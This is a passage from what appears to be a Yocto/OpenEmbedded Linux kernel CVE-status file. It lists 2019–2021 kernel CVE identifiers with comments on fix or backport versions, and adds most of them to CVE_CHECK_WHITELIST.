4410CVE_CHECK_WHITELIST += "CVE-2019-9458"
4411
4412# fixed-version: Fixed after version 5.1rc1
4413CVE_CHECK_WHITELIST += "CVE-2019-9466"
4414
4415# fixed-version: Fixed after version 5.1rc1
4416CVE_CHECK_WHITELIST += "CVE-2019-9500"
4417
4418# fixed-version: Fixed after version 5.1rc1
4419CVE_CHECK_WHITELIST += "CVE-2019-9503"
4420
4421# fixed-version: Fixed after version 5.2
4422CVE_CHECK_WHITELIST += "CVE-2019-9506"
4423
4424# fixed-version: Fixed after version 5.1rc2
4425CVE_CHECK_WHITELIST += "CVE-2019-9857"
4426
4427# cpe-stable-backport: Backported in 5.4.23
4428CVE_CHECK_WHITELIST += "CVE-2020-0009"
4429
4430# fixed-version: Fixed after version 4.16rc3
4431CVE_CHECK_WHITELIST += "CVE-2020-0030"
4432
4433# cpe-stable-backport: Backported in 5.4.4
4434CVE_CHECK_WHITELIST += "CVE-2020-0041"
4435
4436# fixed-version: Fixed after version 4.3rc7
4437CVE_CHECK_WHITELIST += "CVE-2020-0066"
4438
4439# cpe-stable-backport: Backported in 5.4.36
4440CVE_CHECK_WHITELIST += "CVE-2020-0067"
4441
4442# cpe-stable-backport: Backported in 5.4.23
4443CVE_CHECK_WHITELIST += "CVE-2020-0110"
4444
4445# cpe-stable-backport: Backported in 5.4.39
4446CVE_CHECK_WHITELIST += "CVE-2020-0255"
4447
4448# cpe-stable-backport: Backported in 5.4.12
4449CVE_CHECK_WHITELIST += "CVE-2020-0305"
4450
4451# CVE-2020-0347 has no known resolution
4452
4453# cpe-stable-backport: Backported in 5.4.19
4454CVE_CHECK_WHITELIST += "CVE-2020-0404"
4455
4456# cpe-stable-backport: Backported in 5.4.73
4457CVE_CHECK_WHITELIST += "CVE-2020-0423"
4458
4459# cpe-stable-backport: Backported in 5.4.7
4460CVE_CHECK_WHITELIST += "CVE-2020-0427"
4461
4462# fixed-version: Fixed after version 4.14rc4
4463CVE_CHECK_WHITELIST += "CVE-2020-0429"
4464
4465# fixed-version: Fixed after version 4.18rc1
4466CVE_CHECK_WHITELIST += "CVE-2020-0430"
4467
4468# cpe-stable-backport: Backported in 5.4.12
4469CVE_CHECK_WHITELIST += "CVE-2020-0431"
4470
4471# cpe-stable-backport: Backported in 5.4.17
4472CVE_CHECK_WHITELIST += "CVE-2020-0432"
4473
4474# fixed-version: Fixed after version 4.19rc1
4475CVE_CHECK_WHITELIST += "CVE-2020-0433"
4476
4477# fixed-version: Fixed after version 4.19rc1
4478CVE_CHECK_WHITELIST += "CVE-2020-0435"
4479
4480# cpe-stable-backport: Backported in 5.4.24
4481CVE_CHECK_WHITELIST += "CVE-2020-0444"
4482
4483# cpe-stable-backport: Backported in 5.4.63
4484CVE_CHECK_WHITELIST += "CVE-2020-0465"
4485
4486# cpe-stable-backport: Backported in 5.4.61
4487CVE_CHECK_WHITELIST += "CVE-2020-0466"
4488
4489# cpe-stable-backport: Backported in 5.4.46
4490CVE_CHECK_WHITELIST += "CVE-2020-0543"
4491
4492# cpe-stable-backport: Backported in 5.4.72
4493CVE_CHECK_WHITELIST += "CVE-2020-10135"
4494
4495# cpe-stable-backport: Backported in 5.4.8
4496CVE_CHECK_WHITELIST += "CVE-2020-10690"
4497
4498# CVE-2020-10708 has no known resolution
4499
4500# cpe-stable-backport: Backported in 5.4.42
4501CVE_CHECK_WHITELIST += "CVE-2020-10711"
4502
4503# fixed-version: Fixed after version 5.2rc3
4504CVE_CHECK_WHITELIST += "CVE-2020-10720"
4505
4506# cpe-stable-backport: Backported in 5.4.44
4507CVE_CHECK_WHITELIST += "CVE-2020-10732"
4508
4509# fixed-version: Fixed after version 3.16rc1
4510CVE_CHECK_WHITELIST += "CVE-2020-10742"
4511
4512# cpe-stable-backport: Backported in 5.4.39
4513CVE_CHECK_WHITELIST += "CVE-2020-10751"
4514
4515# cpe-stable-backport: Backported in 5.4.45
4516CVE_CHECK_WHITELIST += "CVE-2020-10757"
4517
4518# cpe-stable-backport: Backported in 5.4.47
4519CVE_CHECK_WHITELIST += "CVE-2020-10766"
4520
4521# cpe-stable-backport: Backported in 5.4.47
4522CVE_CHECK_WHITELIST += "CVE-2020-10767"
4523
4524# cpe-stable-backport: Backported in 5.4.47
4525CVE_CHECK_WHITELIST += "CVE-2020-10768"
4526
4527# fixed-version: Fixed after version 5.0rc3
4528CVE_CHECK_WHITELIST += "CVE-2020-10769"
4529
4530# fixed-version: Fixed after version 5.4rc6
4531CVE_CHECK_WHITELIST += "CVE-2020-10773"
4532
4533# CVE-2020-10774 has no known resolution
4534
4535# cpe-stable-backport: Backported in 5.4.53
4536CVE_CHECK_WHITELIST += "CVE-2020-10781"
4537
4538# cpe-stable-backport: Backported in 5.4.24
4539CVE_CHECK_WHITELIST += "CVE-2020-10942"
4540
4541# cpe-stable-backport: Backported in 5.4.32
4542CVE_CHECK_WHITELIST += "CVE-2020-11494"
4543
4544# cpe-stable-backport: Backported in 5.4.31
4545CVE_CHECK_WHITELIST += "CVE-2020-11565"
4546
4547# cpe-stable-backport: Backported in 5.4.29
4548CVE_CHECK_WHITELIST += "CVE-2020-11608"
4549
4550# cpe-stable-backport: Backported in 5.4.29
4551CVE_CHECK_WHITELIST += "CVE-2020-11609"
4552
4553# cpe-stable-backport: Backported in 5.4.29
4554CVE_CHECK_WHITELIST += "CVE-2020-11668"
4555
4556# fixed-version: Fixed after version 5.2rc1
4557CVE_CHECK_WHITELIST += "CVE-2020-11669"
4558
4559# CVE-2020-11725 has no known resolution
4560
4561# cpe-stable-backport: Backported in 5.4.36
4562CVE_CHECK_WHITELIST += "CVE-2020-11884"
4563
4564# CVE-2020-11935 has no known resolution
4565
4566# fixed-version: Fixed after version 5.3rc1
4567CVE_CHECK_WHITELIST += "CVE-2020-12114"
4568
4569# cpe-stable-backport: Backported in 5.4.72
4570CVE_CHECK_WHITELIST += "CVE-2020-12351"
4571
4572# cpe-stable-backport: Backported in 5.4.72
4573CVE_CHECK_WHITELIST += "CVE-2020-12352"
4574
4575# CVE-2020-12362 needs backporting (fixed from 5.11rc1)
4576
4577# CVE-2020-12363 needs backporting (fixed from 5.11rc1)
4578
4579# CVE-2020-12364 needs backporting (fixed from 5.11rc1)
4580
4581# cpe-stable-backport: Backported in 5.4.36
4582CVE_CHECK_WHITELIST += "CVE-2020-12464"
4583
4584# cpe-stable-backport: Backported in 5.4.26
4585CVE_CHECK_WHITELIST += "CVE-2020-12465"
4586
4587# cpe-stable-backport: Backported in 5.4.14
4588CVE_CHECK_WHITELIST += "CVE-2020-12652"
4589
4590# cpe-stable-backport: Backported in 5.4.20
4591CVE_CHECK_WHITELIST += "CVE-2020-12653"
4592
4593# cpe-stable-backport: Backported in 5.4.20
4594CVE_CHECK_WHITELIST += "CVE-2020-12654"
4595
4596# cpe-stable-backport: Backported in 5.4.50
4597CVE_CHECK_WHITELIST += "CVE-2020-12655"
4598
4599# cpe-stable-backport: Backported in 5.4.56
4600CVE_CHECK_WHITELIST += "CVE-2020-12656"
4601
4602# cpe-stable-backport: Backported in 5.4.33
4603CVE_CHECK_WHITELIST += "CVE-2020-12657"
4604
4605# cpe-stable-backport: Backported in 5.4.35
4606CVE_CHECK_WHITELIST += "CVE-2020-12659"
4607
4608# cpe-stable-backport: Backported in 5.4.43
4609CVE_CHECK_WHITELIST += "CVE-2020-12768"
4610
4611# cpe-stable-backport: Backported in 5.4.17
4612CVE_CHECK_WHITELIST += "CVE-2020-12769"
4613
4614# cpe-stable-backport: Backported in 5.4.42
4615CVE_CHECK_WHITELIST += "CVE-2020-12770"
4616
4617# cpe-stable-backport: Backported in 5.4.49
4618CVE_CHECK_WHITELIST += "CVE-2020-12771"
4619
4620# cpe-stable-backport: Backported in 5.4.33
4621CVE_CHECK_WHITELIST += "CVE-2020-12826"
4622
4623# cpe-stable-backport: Backported in 5.4.64
4624CVE_CHECK_WHITELIST += "CVE-2020-12888"
4625
4626# fixed-version: only affects 5.8rc1 onwards
4627CVE_CHECK_WHITELIST += "CVE-2020-12912"
4628
4629# cpe-stable-backport: Backported in 5.4.42
4630CVE_CHECK_WHITELIST += "CVE-2020-13143"
4631
4632# cpe-stable-backport: Backported in 5.4.46
4633CVE_CHECK_WHITELIST += "CVE-2020-13974"
4634
4635# CVE-2020-14304 has no known resolution
4636
4637# fixed-version: Fixed after version 4.12rc1
4638CVE_CHECK_WHITELIST += "CVE-2020-14305"
4639
4640# cpe-stable-backport: Backported in 5.4.61
4641CVE_CHECK_WHITELIST += "CVE-2020-14314"
4642
4643# cpe-stable-backport: Backported in 5.4.58
4644CVE_CHECK_WHITELIST += "CVE-2020-14331"
4645
4646# cpe-stable-backport: Backported in 5.4.78
4647CVE_CHECK_WHITELIST += "CVE-2020-14351"
4648
4649# fixed-version: Fixed after version 4.14rc3
4650CVE_CHECK_WHITELIST += "CVE-2020-14353"
4651
4652# cpe-stable-backport: Backported in 5.4.53
4653CVE_CHECK_WHITELIST += "CVE-2020-14356"
4654
4655# cpe-stable-backport: Backported in 5.4.28
4656CVE_CHECK_WHITELIST += "CVE-2020-14381"
4657
4658# cpe-stable-backport: Backported in 5.4.64
4659CVE_CHECK_WHITELIST += "CVE-2020-14385"
4660
4661# cpe-stable-backport: Backported in 5.4.64
4662CVE_CHECK_WHITELIST += "CVE-2020-14386"
4663
4664# cpe-stable-backport: Backported in 5.4.66
4665CVE_CHECK_WHITELIST += "CVE-2020-14390"
4666
4667# cpe-stable-backport: Backported in 5.4.16
4668CVE_CHECK_WHITELIST += "CVE-2020-14416"
4669
4670# cpe-stable-backport: Backported in 5.4.51
4671CVE_CHECK_WHITELIST += "CVE-2020-15393"
4672
4673# cpe-stable-backport: Backported in 5.4.49
4674CVE_CHECK_WHITELIST += "CVE-2020-15436"
4675
4676# cpe-stable-backport: Backported in 5.4.54
4677CVE_CHECK_WHITELIST += "CVE-2020-15437"
4678
4679# cpe-stable-backport: Backported in 5.4.50
4680CVE_CHECK_WHITELIST += "CVE-2020-15780"
4681
4682# CVE-2020-15802 has no known resolution
4683
4684# fixed-version: only affects 5.5rc1 onwards
4685CVE_CHECK_WHITELIST += "CVE-2020-15852"
4686
4687# cpe-stable-backport: Backported in 5.4.148
4688CVE_CHECK_WHITELIST += "CVE-2020-16119"
4689
4690# CVE-2020-16120 needs backporting (fixed from 5.8rc1)
4691
4692# cpe-stable-backport: Backported in 5.4.57
4693CVE_CHECK_WHITELIST += "CVE-2020-16166"
4694
4695# cpe-stable-backport: Backported in 5.4.5
4696CVE_CHECK_WHITELIST += "CVE-2020-1749"
4697
4698# cpe-stable-backport: Backported in 5.4.51
4699CVE_CHECK_WHITELIST += "CVE-2020-24394"
4700
4701# cpe-stable-backport: Backported in 5.4.56
4702CVE_CHECK_WHITELIST += "CVE-2020-24490"
4703
4704# CVE-2020-24502 has no known resolution
4705
4706# CVE-2020-24503 has no known resolution
4707
4708# CVE-2020-24504 needs backporting (fixed from 5.12rc1)
4709
4710# cpe-stable-backport: Backported in 5.4.124
4711CVE_CHECK_WHITELIST += "CVE-2020-24586"
4712
4713# cpe-stable-backport: Backported in 5.4.124
4714CVE_CHECK_WHITELIST += "CVE-2020-24587"
4715
4716# cpe-stable-backport: Backported in 5.4.124
4717CVE_CHECK_WHITELIST += "CVE-2020-24588"
4718
4719# cpe-stable-backport: Backported in 5.4.70
4720CVE_CHECK_WHITELIST += "CVE-2020-25211"
4721
4722# cpe-stable-backport: Backported in 5.4.60
4723CVE_CHECK_WHITELIST += "CVE-2020-25212"
4724
4725# CVE-2020-25220 has no known resolution
4726
4727# fixed-version: only affects 5.7rc1 onwards
4728CVE_CHECK_WHITELIST += "CVE-2020-25221"
4729
4730# cpe-stable-backport: Backported in 5.4.66
4731CVE_CHECK_WHITELIST += "CVE-2020-25284"
4732
4733# cpe-stable-backport: Backported in 5.4.64
4734CVE_CHECK_WHITELIST += "CVE-2020-25285"
4735
4736# cpe-stable-backport: Backported in 5.4.102
4737CVE_CHECK_WHITELIST += "CVE-2020-25639"
4738
4739# cpe-stable-backport: Backported in 5.4.64
4740CVE_CHECK_WHITELIST += "CVE-2020-25641"
4741
4742# cpe-stable-backport: Backported in 5.4.68
4743CVE_CHECK_WHITELIST += "CVE-2020-25643"
4744
4745# cpe-stable-backport: Backported in 5.4.68
4746CVE_CHECK_WHITELIST += "CVE-2020-25645"
4747
4748# cpe-stable-backport: Backported in 5.4.75
4749CVE_CHECK_WHITELIST += "CVE-2020-25656"
4750
4751# CVE-2020-25661 has no known resolution
4752
4753# CVE-2020-25662 has no known resolution
4754
4755# cpe-stable-backport: Backported in 5.4.75
4756CVE_CHECK_WHITELIST += "CVE-2020-25668"
4757
4758# cpe-stable-backport: Backported in 5.4.79
4759CVE_CHECK_WHITELIST += "CVE-2020-25669"
4760
4761# cpe-stable-backport: Backported in 5.4.112
4762CVE_CHECK_WHITELIST += "CVE-2020-25670"
4763
4764# cpe-stable-backport: Backported in 5.4.112
4765CVE_CHECK_WHITELIST += "CVE-2020-25671"
4766
4767# cpe-stable-backport: Backported in 5.4.112
4768CVE_CHECK_WHITELIST += "CVE-2020-25672"
4769
4770# cpe-stable-backport: Backported in 5.4.112
4771CVE_CHECK_WHITELIST += "CVE-2020-25673"
4772
4773# cpe-stable-backport: Backported in 5.4.76
4774CVE_CHECK_WHITELIST += "CVE-2020-25704"
4775
4776# cpe-stable-backport: Backported in 5.4.73
4777CVE_CHECK_WHITELIST += "CVE-2020-25705"
4778
4779# cpe-stable-backport: Backported in 5.4.59
4780CVE_CHECK_WHITELIST += "CVE-2020-26088"
4781
4782# cpe-stable-backport: Backported in 5.4.124
4783CVE_CHECK_WHITELIST += "CVE-2020-26139"
4784
4785# CVE-2020-26140 has no known resolution
4786
4787# cpe-stable-backport: Backported in 5.4.124
4788CVE_CHECK_WHITELIST += "CVE-2020-26141"
4789
4790# CVE-2020-26142 has no known resolution
4791
4792# CVE-2020-26143 has no known resolution
4793
4794# cpe-stable-backport: Backported in 5.4.124
4795CVE_CHECK_WHITELIST += "CVE-2020-26145"
4796
4797# cpe-stable-backport: Backported in 5.4.124
4798CVE_CHECK_WHITELIST += "CVE-2020-26147"
4799
4800# cpe-stable-backport: Backported in 5.4.129
4801CVE_CHECK_WHITELIST += "CVE-2020-26541"
4802
4803# cpe-stable-backport: Backported in 5.4.122
4804CVE_CHECK_WHITELIST += "CVE-2020-26555"
4805
4806# CVE-2020-26556 has no known resolution
4807
4808# CVE-2020-26557 has no known resolution
4809
4810# cpe-stable-backport: Backported in 5.4.122
4811CVE_CHECK_WHITELIST += "CVE-2020-26558"
4812
4813# CVE-2020-26559 has no known resolution
4814
4815# CVE-2020-26560 has no known resolution
4816
4817# cpe-stable-backport: Backported in 5.4.29
4818CVE_CHECK_WHITELIST += "CVE-2020-27066"
4819
4820# fixed-version: Fixed after version 4.14rc4
4821CVE_CHECK_WHITELIST += "CVE-2020-27067"
4822
4823# cpe-stable-backport: Backported in 5.4.24
4824CVE_CHECK_WHITELIST += "CVE-2020-27068"
4825
4826# fixed-version: only affects 5.6rc1 onwards
4827CVE_CHECK_WHITELIST += "CVE-2020-27152"
4828
4829# fixed-version: only affects 5.10rc1 onwards
4830CVE_CHECK_WHITELIST += "CVE-2020-27170"
4831
4832# fixed-version: only affects 5.10rc1 onwards
4833CVE_CHECK_WHITELIST += "CVE-2020-27171"
4834
4835# fixed-version: only affects 5.7rc1 onwards
4836CVE_CHECK_WHITELIST += "CVE-2020-27194"
4837
4838# cpe-stable-backport: Backported in 5.4.23
4839CVE_CHECK_WHITELIST += "CVE-2020-2732"
4840
4841# cpe-stable-backport: Backported in 5.4.25
4842CVE_CHECK_WHITELIST += "CVE-2020-27418"
4843
4844# cpe-stable-backport: Backported in 5.4.75
4845CVE_CHECK_WHITELIST += "CVE-2020-27673"
4846
4847# cpe-stable-backport: Backported in 5.4.75
4848CVE_CHECK_WHITELIST += "CVE-2020-27675"
4849
4850# cpe-stable-backport: Backported in 5.4.75
4851CVE_CHECK_WHITELIST += "CVE-2020-27777"
4852
4853# cpe-stable-backport: Backported in 5.4.73
4854CVE_CHECK_WHITELIST += "CVE-2020-27784"
4855
4856# cpe-stable-backport: Backported in 5.4.42
4857CVE_CHECK_WHITELIST += "CVE-2020-27786"
4858
4859# cpe-stable-backport: Backported in 5.4.86
4860CVE_CHECK_WHITELIST += "CVE-2020-27815"
4861
4862# cpe-stable-backport: Backported in 5.4.162
4863CVE_CHECK_WHITELIST += "CVE-2020-27820"
4864
4865# cpe-stable-backport: Backported in 5.4.94
4866CVE_CHECK_WHITELIST += "CVE-2020-27825"
4867
4868# cpe-stable-backport: Backported in 5.4.83
4869CVE_CHECK_WHITELIST += "CVE-2020-27830"
4870
4871# CVE-2020-27835 needs backporting (fixed from 5.10rc6)
4872
4873# cpe-stable-backport: Backported in 5.4.66
4874CVE_CHECK_WHITELIST += "CVE-2020-28097"
4875
4876# cpe-stable-backport: Backported in 5.4.89
4877CVE_CHECK_WHITELIST += "CVE-2020-28374"
4878
4879# cpe-stable-backport: Backported in 5.4.83
4880CVE_CHECK_WHITELIST += "CVE-2020-28588"
4881
4882# cpe-stable-backport: Backported in 5.4.71
4883CVE_CHECK_WHITELIST += "CVE-2020-28915"
4884
4885# cpe-stable-backport: Backported in 5.4.80
4886CVE_CHECK_WHITELIST += "CVE-2020-28941"
4887
4888# cpe-stable-backport: Backported in 5.4.76
4889CVE_CHECK_WHITELIST += "CVE-2020-28974"
4890
4891# cpe-stable-backport: Backported in 5.4.48
4892CVE_CHECK_WHITELIST += "CVE-2020-29368"
4893
4894# cpe-stable-backport: Backported in 5.4.54
4895CVE_CHECK_WHITELIST += "CVE-2020-29369"
4896
4897# cpe-stable-backport: Backported in 5.4.27
4898CVE_CHECK_WHITELIST += "CVE-2020-29370"
4899
4900# cpe-stable-backport: Backported in 5.4.61
4901CVE_CHECK_WHITELIST += "CVE-2020-29371"
4902
4903# fixed-version: only affects 5.6rc1 onwards
4904CVE_CHECK_WHITELIST += "CVE-2020-29372"
4905
4906# CVE-2020-29373 needs backporting (fixed from 5.6rc2)
4907
4908# cpe-stable-backport: Backported in 5.4.47
4909CVE_CHECK_WHITELIST += "CVE-2020-29374"
4910
4911# CVE-2020-29534 needs backporting (fixed from 5.10rc1)
4912
4913# cpe-stable-backport: Backported in 5.4.86
4914CVE_CHECK_WHITELIST += "CVE-2020-29568"
4915
4916# cpe-stable-backport: Backported in 5.4.86
4917CVE_CHECK_WHITELIST += "CVE-2020-29569"
4918
4919# cpe-stable-backport: Backported in 5.4.83
4920CVE_CHECK_WHITELIST += "CVE-2020-29660"
4921
4922# cpe-stable-backport: Backported in 5.4.83
4923CVE_CHECK_WHITELIST += "CVE-2020-29661"
4924
4925# fixed-version: only affects 5.10rc1 onwards
4926CVE_CHECK_WHITELIST += "CVE-2020-35499"
4927
4928# CVE-2020-35501 has no known resolution
4929
4930# cpe-stable-backport: Backported in 5.4.76
4931CVE_CHECK_WHITELIST += "CVE-2020-35508"
4932
4933# fixed-version: Fixed after version 4.17rc1
4934CVE_CHECK_WHITELIST += "CVE-2020-35513"
4935
4936# cpe-stable-backport: Backported in 5.4.82
4937CVE_CHECK_WHITELIST += "CVE-2020-35519"
4938
4939# cpe-stable-backport: Backported in 5.4.88
4940CVE_CHECK_WHITELIST += "CVE-2020-36158"
4941
4942# CVE-2020-36310 needs backporting (fixed from 5.8rc1)
4943
4944# cpe-stable-backport: Backported in 5.4.131
4945CVE_CHECK_WHITELIST += "CVE-2020-36311"
4946
4947# cpe-stable-backport: Backported in 5.4.66
4948CVE_CHECK_WHITELIST += "CVE-2020-36312"
4949
4950# fixed-version: only affects 5.7rc1 onwards
4951CVE_CHECK_WHITELIST += "CVE-2020-36313"
4952
4953# cpe-stable-backport: Backported in 5.4.88
4954CVE_CHECK_WHITELIST += "CVE-2020-36322"
4955
4956# CVE-2020-36385 needs backporting (fixed from 5.10rc1)
4957
4958# cpe-stable-backport: Backported in 5.4.58
4959CVE_CHECK_WHITELIST += "CVE-2020-36386"
4960
4961# fixed-version: only affects 5.7rc1 onwards
4962CVE_CHECK_WHITELIST += "CVE-2020-36387"
4963
4964# cpe-stable-backport: Backported in 5.4.176
4965CVE_CHECK_WHITELIST += "CVE-2020-36516"
4966
4967# cpe-stable-backport: Backported in 5.4.30
4968CVE_CHECK_WHITELIST += "CVE-2020-36557"
4969
4970# cpe-stable-backport: Backported in 5.4.23
4971CVE_CHECK_WHITELIST += "CVE-2020-36558"
4972
4973# CVE-2020-36691 needs backporting (fixed from 5.8rc1)
4974
4975# cpe-stable-backport: Backported in 5.4.86
4976CVE_CHECK_WHITELIST += "CVE-2020-36694"
4977
4978# cpe-stable-backport: Backported in 5.4.62
4979CVE_CHECK_WHITELIST += "CVE-2020-36766"
4980
4981# cpe-stable-backport: Backported in 5.4.189
4982CVE_CHECK_WHITELIST += "CVE-2020-36775"
4983
4984# fixed-version: only affects 5.8rc4 onwards
4985CVE_CHECK_WHITELIST += "CVE-2020-36776"
4986
4987# cpe-stable-backport: Backported in 5.4.118
4988CVE_CHECK_WHITELIST += "CVE-2020-36777"
4989
4990# fixed-version: only affects 5.6rc1 onwards
4991CVE_CHECK_WHITELIST += "CVE-2020-36778"
4992
4993# fixed-version: only affects 5.6rc1 onwards
4994CVE_CHECK_WHITELIST += "CVE-2020-36779"
4995
4996# cpe-stable-backport: Backported in 5.4.119
4997CVE_CHECK_WHITELIST += "CVE-2020-36780"
4998
4999# CVE-2020-36781 needs backporting (fixed from 5.13rc1)
5000
5001# cpe-stable-backport: Backported in 5.4.119
5002CVE_CHECK_WHITELIST += "CVE-2020-36782"
5003
5004# cpe-stable-backport: Backported in 5.4.119
5005CVE_CHECK_WHITELIST += "CVE-2020-36783"
5006
5007# CVE-2020-36784 needs backporting (fixed from 5.13rc1)
5008
5009# fixed-version: only affects 5.8rc1 onwards
5010CVE_CHECK_WHITELIST += "CVE-2020-36785"
5011
5012# fixed-version: only affects 5.10rc1 onwards
5013CVE_CHECK_WHITELIST += "CVE-2020-36786"
5014
5015# cpe-stable-backport: Backported in 5.4.119
5016CVE_CHECK_WHITELIST += "CVE-2020-36787"
5017
5018# cpe-stable-backport: Backported in 5.4.143
5019CVE_CHECK_WHITELIST += "CVE-2020-3702"
5020
5021# cpe-stable-backport: Backported in 5.4.79
5022CVE_CHECK_WHITELIST += "CVE-2020-4788"
5023
5024# fixed-version: Fixed after version 5.2rc1
5025CVE_CHECK_WHITELIST += "CVE-2020-7053"
5026
5027# cpe-stable-backport: Backported in 5.4.16
5028CVE_CHECK_WHITELIST += "CVE-2020-8428"
5029
5030# cpe-stable-backport: Backported in 5.4.25
5031CVE_CHECK_WHITELIST += "CVE-2020-8647"
5032
5033# cpe-stable-backport: Backported in 5.4.25
5034CVE_CHECK_WHITELIST += "CVE-2020-8648"
5035
5036# cpe-stable-backport: Backported in 5.4.25
5037CVE_CHECK_WHITELIST += "CVE-2020-8649"
5038
5039# cpe-stable-backport: Backported in 5.4.77
5040CVE_CHECK_WHITELIST += "CVE-2020-8694"
5041
5042# CVE-2020-8832 has no known resolution
5043
5044# fixed-version: Fixed after version 4.18rc1
5045CVE_CHECK_WHITELIST += "CVE-2020-8834"
5046
5047# fixed-version: only affects 5.5rc1 onwards
5048CVE_CHECK_WHITELIST += "CVE-2020-8835"
5049
5050# cpe-stable-backport: Backported in 5.4.21
5051CVE_CHECK_WHITELIST += "CVE-2020-8992"
5052
5053# cpe-stable-backport: Backported in 5.4.23
5054CVE_CHECK_WHITELIST += "CVE-2020-9383"
5055
5056# cpe-stable-backport: Backported in 5.4.23
5057CVE_CHECK_WHITELIST += "CVE-2020-9391"
5058
5059# cpe-stable-backport: Backported in 5.4.122
5060CVE_CHECK_WHITELIST += "CVE-2021-0129"
5061
5062# cpe-stable-backport: Backported in 5.4.47
5063CVE_CHECK_WHITELIST += "CVE-2021-0342"
5064
5065# CVE-2021-0399 has no known resolution
5066
5067# fixed-version: Fixed after version 4.15rc1
5068CVE_CHECK_WHITELIST += "CVE-2021-0447"
5069
5070# cpe-stable-backport: Backported in 5.4.70
5071CVE_CHECK_WHITELIST += "CVE-2021-0448"
5072
5073# cpe-stable-backport: Backported in 5.4.101
5074CVE_CHECK_WHITELIST += "CVE-2021-0512"
5075
5076# cpe-stable-backport: Backported in 5.4.68
5077CVE_CHECK_WHITELIST += "CVE-2021-0605"
5078
5079# CVE-2021-0606 has no known resolution
5080
5081# CVE-2021-0695 has no known resolution
5082
5083# fixed-version: only affects 5.8rc4 onwards
5084CVE_CHECK_WHITELIST += "CVE-2021-0707"
5085
5086# cpe-stable-backport: Backported in 5.4.137
5087CVE_CHECK_WHITELIST += "CVE-2021-0920"
5088
5089# CVE-2021-0924 has no known resolution
5090
5091# CVE-2021-0929 needs backporting (fixed from 5.6rc1)
5092
5093# fixed-version: Fixed after version 4.16rc7
5094CVE_CHECK_WHITELIST += "CVE-2021-0935"
5095
5096# CVE-2021-0936 has no known resolution
5097
5098# cpe-stable-backport: Backported in 5.4.113
5099CVE_CHECK_WHITELIST += "CVE-2021-0937"
5100
5101# cpe-stable-backport: Backported in 5.4.84
5102CVE_CHECK_WHITELIST += "CVE-2021-0938"
5103
5104# cpe-stable-backport: Backported in 5.4.110
5105CVE_CHECK_WHITELIST += "CVE-2021-0941"
5106
5107# CVE-2021-0961 has no known resolution
5108
5109# fixed-version: only affects 5.9rc2 onwards
5110CVE_CHECK_WHITELIST += "CVE-2021-1048"
5111
5112# CVE-2021-20177 needs backporting (fixed from 5.5rc1)
5113
5114# fixed-version: only affects 5.5rc1 onwards
5115CVE_CHECK_WHITELIST += "CVE-2021-20194"
5116
5117# CVE-2021-20219 has no known resolution
5118
5119# fixed-version: only affects 5.5rc1 onwards
5120CVE_CHECK_WHITELIST += "CVE-2021-20226"
5121
5122# CVE-2021-20239 needs backporting (fixed from 5.9rc1)
5123
5124# fixed-version: Fixed after version 4.5rc5
5125CVE_CHECK_WHITELIST += "CVE-2021-20261"
5126
5127# fixed-version: Fixed after version 4.5rc3
5128CVE_CHECK_WHITELIST += "CVE-2021-20265"
5129
5130# fixed-version: only affects 5.7rc1 onwards
5131CVE_CHECK_WHITELIST += "CVE-2021-20268"
5132
5133# cpe-stable-backport: Backported in 5.4.59
5134CVE_CHECK_WHITELIST += "CVE-2021-20292"
5135
5136# fixed-version: Fixed after version 5.4rc1
5137CVE_CHECK_WHITELIST += "CVE-2021-20317"
5138
5139# cpe-stable-backport: Backported in 5.4.148
5140CVE_CHECK_WHITELIST += "CVE-2021-20320"
5141
5142# cpe-stable-backport: Backported in 5.4.153
5143CVE_CHECK_WHITELIST += "CVE-2021-20321"
5144
5145# cpe-stable-backport: Backported in 5.4.146
5146CVE_CHECK_WHITELIST += "CVE-2021-20322"
5147
5148# cpe-stable-backport: Backported in 5.4.99
5149CVE_CHECK_WHITELIST += "CVE-2021-21781"
5150
5151# cpe-stable-backport: Backported in 5.4.129
5152CVE_CHECK_WHITELIST += "CVE-2021-22543"
5153
5154# cpe-stable-backport: Backported in 5.4.113
5155CVE_CHECK_WHITELIST += "CVE-2021-22555"
5156
5157# fixed-version: only affects 5.6 onwards
5158CVE_CHECK_WHITELIST += "CVE-2021-22600"
5159
5160# cpe-stable-backport: Backported in 5.4.114
5161CVE_CHECK_WHITELIST += "CVE-2021-23133"
5162
5163# fixed-version: only affects 5.12rc7 onwards
5164CVE_CHECK_WHITELIST += "CVE-2021-23134"
5165
5166# cpe-stable-backport: Backported in 5.4.184
5167CVE_CHECK_WHITELIST += "CVE-2021-26401"
5168
5169# fixed-version: only affects 5.5rc1 onwards
5170CVE_CHECK_WHITELIST += "CVE-2021-26708"
5171
5172# cpe-stable-backport: Backported in 5.4.100
5173CVE_CHECK_WHITELIST += "CVE-2021-26930"
5174
5175# cpe-stable-backport: Backported in 5.4.100
5176CVE_CHECK_WHITELIST += "CVE-2021-26931"
5177
5178# cpe-stable-backport: Backported in 5.4.100
5179CVE_CHECK_WHITELIST += "CVE-2021-26932"
5180
5181# CVE-2021-26934 has no known resolution
5182
5183# cpe-stable-backport: Backported in 5.4.103
5184CVE_CHECK_WHITELIST += "CVE-2021-27363"
5185
5186# cpe-stable-backport: Backported in 5.4.103
5187CVE_CHECK_WHITELIST += "CVE-2021-27364"
5188
5189# cpe-stable-backport: Backported in 5.4.103
5190CVE_CHECK_WHITELIST += "CVE-2021-27365"
5191
5192# cpe-stable-backport: Backported in 5.4.103
5193CVE_CHECK_WHITELIST += "CVE-2021-28038"
5194
5195# fixed-version: only affects 5.9rc4 onwards
5196CVE_CHECK_WHITELIST += "CVE-2021-28039"
5197
5198# cpe-stable-backport: Backported in 5.4.106
5199CVE_CHECK_WHITELIST += "CVE-2021-28375"
5200
5201# cpe-stable-backport: Backported in 5.4.106
5202CVE_CHECK_WHITELIST += "CVE-2021-28660"
5203
5204# cpe-stable-backport: Backported in 5.4.109
5205CVE_CHECK_WHITELIST += "CVE-2021-28688"
5206
5207# fixed-version: only affects 5.5rc1 onwards
5208CVE_CHECK_WHITELIST += "CVE-2021-28691"
5209
5210# cpe-stable-backport: Backported in 5.4.168
5211CVE_CHECK_WHITELIST += "CVE-2021-28711"
5212
5213# cpe-stable-backport: Backported in 5.4.168
5214CVE_CHECK_WHITELIST += "CVE-2021-28712"
5215
5216# cpe-stable-backport: Backported in 5.4.168
5217CVE_CHECK_WHITELIST += "CVE-2021-28713"
5218
5219# cpe-stable-backport: Backported in 5.4.168
5220CVE_CHECK_WHITELIST += "CVE-2021-28714"
5221
5222# cpe-stable-backport: Backported in 5.4.168
5223CVE_CHECK_WHITELIST += "CVE-2021-28715"
5224
5225# fixed-version: only affects 5.11rc1 onwards
